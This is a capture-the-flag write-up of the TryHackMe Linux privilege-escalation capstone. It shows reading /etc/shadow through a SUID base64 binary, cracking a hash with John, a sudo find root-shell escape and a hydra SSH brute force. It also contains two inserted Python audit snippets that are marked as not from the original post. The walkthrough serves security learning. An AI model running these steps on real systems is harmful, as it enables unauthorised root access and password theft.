
THM LinuxPrivEsc - 12 Capstone Challenge

source link: https://sebport0.github.io/thm-linuxprivesc-12capstonechallenge/

Recently I was introduced by a friend of mine (thanks Ori) to a new world. That world is the TryHackMe platform and, oh, what an addictive piece of hacking gaming madness wonder it is.

In this piece of text I would like to talk (or write?) about the Capstone Challenge from the Linux PrivEsc room.

Capstone Challenge

Mission: read the contents of flag1.txt and flag2.txt.

To start, let’s search for the flags with our current user. Maybe luck is on our side.

find / -name flag1.txt 2>/dev/null

Nothing.

find / -name flag2.txt 2>/dev/null

Nothing. As expected. We need access to a more privileged user. Let’s try our luck with /etc/passwd to see if some user looks promising.

cat /etc/passwd | cut -d ":" -f 1

We got:

root
bin
daemon
adm
lp
sync
shutdown
halt
mail
operator
games
ftp
nobody
pegasus
systemd-network
dbus
polkitd
colord
unbound
libstoragemgmt
saslauth
rpc
gluster
abrt
postfix
setroubleshoot
rtkit
pulse
radvd
chrony
saned
apache
qemu
ntp
tss
sssd
usbmuxd
geoclue
gdm
rpcuser
nfsnobody
gnome-initial-setup
pcp
sshd
avahi
oprofile
tcpdump
leonard
mailnull
smmsp
nscd
missy

From the list above, missy looks promising. In fact, we can see that there is a dir with her name under /home:

$ ls /home -l
total 4
drwx------.  7 leonard leonard  197 jun  7  2021 leonard
drwx------. 16 missy   missy   4096 jun  7  2021 missy
drwx------.  2 root    root      23 jun  7  2021 rootflag

A closer look at /etc/passwd shows us that

$ cat /etc/passwd
missy:x:1001:1001::/home/missy:/bin/bash

This entry tells us:

  • Username: missy.
  • Password: x indicates that the password hash is stored inside /etc/shadow.
  • Userid: 1001.
  • Groupid: 1001.
  • Userid info: none.
  • Home dir: /home/missy.
  • Login shell: /bin/bash.
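As an added example (not from the original post), here is a small Python parser for the seven-field format just described, plus a triage step that flags the accounts worth a second look; every sample line except missy's is constructed.

```python
# Added example (not from the original post): parse /etc/passwd lines into the
# seven fields described above and triage which accounts can actually log in.
from dataclasses import dataclass
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}

@dataclass
class PasswdEntry:
    name: str
    passwd: str   # "x" means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str    # "user id info", often empty as in missy's entry
    home: str
    shell: str

def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse the text of an /etc/passwd file; reject malformed lines loudly."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries

def interesting_accounts(entries: list[PasswdEntry]) -> dict[str, list[str]]:
    """Accounts to look at first: real login shell, extra UID 0, or hash kept in passwd."""
    findings = {}
    for e in entries:
        reasons = []
        if e.shell not in NOLOGIN_SHELLS:   # an empty shell field means /bin/sh
            reasons.append("interactive shell")
        if e.uid == 0 and e.name != "root":
            reasons.append("uid 0 but not root")
        if e.passwd not in ("x", "*", "!", "!!"):
            reasons.append("password field not delegated to /etc/shadow")
        if reasons:
            findings[e.name] = reasons
    return findings
# Constructed sample: missy's line is the one quoted above, the others are invented.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
leonard:x:1000:1000::/home/leonard:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash
"""
```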

Ok, the x tells us that we need to look inside /etc/shadow, but this time cat /etc/shadow doesn’t help us:

$ cat /etc/shadow
cat: /etc/shadow: Permission denied

But maybe, just maybe ;), we can leverage some SUID or SGID exploit. Let’s search:

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/base64
/usr/bin/ksu
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/Xorg
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/kde4/kpac_dhcp_helper
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/qemu-bridge-helper
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/proxy_child
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/flatpak-bwrap
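As an added example (not from the original post), here is the check a defender would run over a listing like this one: flag setuid/setgid files that an expected baseline does not account for. The baseline and the sample modes are constructed for the example, and scan_tree is an assumed helper, not part of any tool.

```python
# Added example (not from the original post): report setuid/setgid files missing from
# an expected baseline; a file reader such as base64 carrying setuid is such an anomaly.
import os
import stat
# Constructed baseline of setuid programs a stock install carries; build it from a clean host.
EXPECTED_SETUID = {
    "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/chage", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/crontab", "/usr/bin/pkexec", "/usr/sbin/unix_chkpwd",
}
def special_bits(mode: int) -> list[str]:
    """Name the setuid/setgid bits present in an st_mode value."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    return bits
def audit_modes(entries, baseline=EXPECTED_SETUID) -> dict[str, list[str]]:
    """entries: (path, st_mode) pairs -> {path: bits} for regular files not in baseline."""
    findings = {}
    for path, mode in entries:
        if not stat.S_ISREG(mode):      # setgid directories are normal; symlinks skipped
            continue
        bits = special_bits(mode)
        if bits and path not in baseline:
            findings[path] = bits
    return findings
def scan_tree(root: str = "/") -> dict[str, list[str]]:
    """Live counterpart of `find / -perm -u=s`: walk the tree and audit every file."""
    def modes():
        for dirpath, dirnames, filenames in os.walk(root):
            if dirpath.rstrip("/") in ("/proc", "/sys", "/dev"):
                dirnames[:] = []    # do not descend into pseudo-filesystems
                continue
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    yield path, os.lstat(path).st_mode
                except OSError:
                    continue
    return audit_modes(modes())

# Constructed sample modelled on the listing above; the mode values are invented.
SAMPLE = [
    ("/usr/bin/base64", stat.S_IFREG | stat.S_ISUID | 0o755),   # -rwsr-xr-x, not in baseline
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),   # expected
    ("/usr/bin/find", stat.S_IFREG | 0o755),                    # no special bits
    ("/var/spool/mail", stat.S_IFDIR | stat.S_ISGID | 0o775),   # setgid dir, ignored
]
```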

Nice! base64 is SUID. As GTFOBins shows, a SUID base64 lets us read files that our current user otherwise can’t.

$ base64 /etc/shadow | base64 --decode
root:$6$DWBzMoip..too long...nYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
bin:*:18353:0:99999:7:::
..snip..
nscd:!!:18785::::::
missy:$6$BjOlWE21...too long...KHb/:18785:0:99999:7:::

Now we can try to crack the password with John! On our local machine we create two files, passwd.txt and shadow.txt, that are copy-pastes of /etc/passwd and /etc/shadow respectively. Then we unshadow them into a new file:

$ unshadow passwd.txt shadow.txt > passwords.txt

Now we run John with the rockyou.txt wordlist and cross our fingers:

$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

But this takes a loooot of time. A better way to find missy’s password is by doing:

$ echo "$6...too long but this is the missy password from /etc/shadow...I3rPVqKHb/" > missy_passw.txt
$ john missy_passw.txt --show
?:Password1

1 password hash cracked, 0 left

Thank you, John. Let’s log in as missy:

$ su missy
Password: 
$ whoami
missy
$ id
uid=1001(missy) gid=1001(missy) groups=1001(missy) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Let’s see what we can do

$ sudo -l
Matching Defaults entries for missy on ip-10-10-72-255:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-72-255:
    (ALL) NOPASSWD: /usr/bin/find

Cool, we can use find! Let’s go for flag1

$ find / -name flag1.txt 2>/dev/null
/home/missy/Documents/flag1.txt

$ cat /home/missy/Documents/flag1.txt
THM-********

Just one more flag to go.

$ find / -name flag2.txt 2>/dev/null

Nothing :(

What can we do? Running find as sudo may give us better results

$ sudo find / -name flag2.txt 2>/dev/null
/home/rootflag/flag2.txt

Of course, we can’t read flag2.txt, since it is in /home/rootflag. What do we do now? If we take a look at the GTFOBins entry for find, we see that we can use find to launch a root shell. Magic! Let’s try it!

$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root

We are root now! Let’s get the remaining flag

$ cat /home/rootflag/flag2.txt
THM-************8

Done!! >:)

Extras

Reading the flags as leonard

Could we use the base64 abuse to read the flags as leonard? Yep, totally, but we would have to guess the flags’ locations correctly:

$ base64 /home/missy/Documents/flag1.txt | base64 --decode
THM-*********
$ base64 /home/rootflag/flag2.txt | base64 --decode
THM-***********

Looking for a Linux kernel vulnerability to exploit

We can read /proc/version to get some information about the kernel:

$ cat /proc/version
Linux version 3.10.0-1160.el7.x86_64 ([email protected]) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Mon Oct 19 16:18:59 UTC 2020

So, the Linux kernel version is 3.10.0-1160.el7… You get it. A quick search on exploit-db did not turn up anything promising to try.

Adding a new user to /etc/passwd

We can generate a password hash for our totally-invented new user with openssl. The problem is that, as leonard, we can’t edit /etc/passwd.

Crontabs

A look at the crontabs doesn’t show anything:

$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be execute

Hydra

Maybe running hydra with the rockyou wordlist could take us somewhere, but it is very slow:

$ hydra -l missy -P baul/rockyou.txt ssh://$TARGET
